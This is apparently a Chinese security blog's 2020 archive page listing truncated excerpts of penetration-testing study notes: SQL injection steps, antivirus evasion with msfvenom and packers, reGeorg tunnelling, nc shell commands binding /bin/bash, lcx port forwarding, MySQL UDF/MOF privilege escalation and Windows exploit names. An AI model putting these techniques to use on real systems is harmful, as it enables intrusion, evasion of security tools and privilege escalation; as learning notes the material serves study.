01 2020 档案
摘要:今天年初六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 add 选择payload类型和填攻击机ip
阅读全文
摘要: 1 判断查询列数 2 判断显示位 添加过狗参数 3 查询库名 4 查询表名 5 查第一个flag值 6 查询列名 7 查看用户名和密码 8 密码md5解密 9 用工具扫一下后台路径 10 还扫到了一个重装漏洞 11 登陆进后台 12 寻找上传点并上马,用burpsuit改包,使form data
阅读全文
摘要:年初五 财神入 第一关 联合注入 1.准备 2.加'截断 3.order by 判断查询列数 4.同上 5.联合查询判断字段位置 6.查数据库名 7.1 查表名 7.2 查列名 8.查数据 第二关 不需要单引号截断,查询代码用了整数值 其余与第一关相同 第三关 说明用了(' ')结构 换成')即可
阅读全文
摘要:年初四 免杀 msfvenom encoder e 编码器 i 编码次数 多次编码 花指令 bad chars b '\x00' the backdoor factory upx 加壳 少用,基本能识别 .net壳 分离免杀 shellcode提取,动态加载
阅读全文
摘要:年初三 跨边界代理 reGeorg 1.python2 安装 urllib3 库 2.上传tunnel.nosocket.php代理脚本到目标机器web路径下 3.访问该文件确认能够执行 4.python2执行主程序reGeorgSocksProxy.py,连接代理脚本 python reGeorg
阅读全文
摘要:从我的思维导图笔记里导出来的,可能看起来不太直观,有时间再补点示例图 反弹shell /bin目录下带sh的都是shell nc 1.正向连接,目标机监听自身端口,攻击机主动建立连接 目标机:nc lvvp 端口 e /bin/bash ( e cmd.exe) 攻击机:nc vv 目标IP 监听端
阅读全文
摘要:跨边界转发 端口转发 lcx 流程 目标机 ./lcx slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 tran参数 如果某端口设置为不可访问,用
阅读全文
摘要:服务提权 mysql UDF提权 要求有写权限,并且未过滤单引号 windows UDF导出到系统目录 C:/WINDOWS/SYSTEM32/ MYSQL版本 5.1 linux /usr/lib/mysql/plugin MOF提权 只有windows 步骤 1.找个可写目录,将MOF文件上传
阅读全文
摘要:windows 系统漏洞,ms系列 ms08 067 ms09 012 pr.exe/巴西烤肉提权 ms09 020 iis5/6 ms12 020 rdp蓝屏 ms17 010 永恒之蓝/wannacry cve 2019 0708 rdp/命令执行 粘滞键提权(sethc.exe) 使用cmd.
阅读全文
摘要:linux 系统信息 grep MenTotal /proc/meminfo 查看系统内存总量 cat /etc/issue 查看系统名称 cat /etc/lsb release 查看系统名称、版本号 uname a 查看内核信息 ls /root | grep vmlinuz 查看内核信息 用户
阅读全文
摘要:windows 用户相关 query user 查看当前在线的用户 whoami 查看当前用户 net user 查看当前系统全部用户 net1 user 查看当前系统全部用户(高权限命令) net user /domain 查看当前域全部用户 net user administrator 查看ad
阅读全文
浙公网安备 33010602011771号